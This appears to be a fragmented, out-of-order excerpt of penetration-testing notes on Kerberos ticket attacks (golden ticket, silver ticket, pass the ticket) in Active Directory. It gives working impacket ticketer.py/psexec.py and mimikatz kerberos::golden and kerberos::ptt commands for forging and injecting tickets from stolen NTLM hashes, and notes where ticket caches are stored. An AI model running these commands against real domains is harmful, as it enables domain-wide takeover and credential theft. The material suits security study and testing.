ticket

7. Golden ticket similar to Silver Ticket craft TGT using NTLM hash of the krbtgt AD account allows access to any machine in the domain hash obtained from the LSASS process or the NTDS.dit file of any DC in the domain Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME kerberos::ptt TICKET....

5. Pass the ticket similar to Pass The Key steals ticket instead of requesting ticket via known hash in Linux, tickets are stored in credential caches (ccache) 3 main locations: files, /tmp/krb5cc_%{uid} (default) Kernel Keyrings - specail space in Linux kernel for storing keys process memory - used when only one process needs to use the ticket in Windows, tickets are handled and stored by the LSASS (Local Security Authority Subsystem Service) process responsible for security....

6. Silver ticket craft valid TGS for a service after owning NTLM hash of an account gain access of that service by forging custom TGS with max privilege Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows) Linux ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME export KRB5CCNAME=USERNAME.ccache psexec.py DOMAIN\USERNAME@$IP -k -no-pass Windows .\mimikatz.exe kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME kerberos::ptt TICKET.kirbi or use Rubeus to do the same...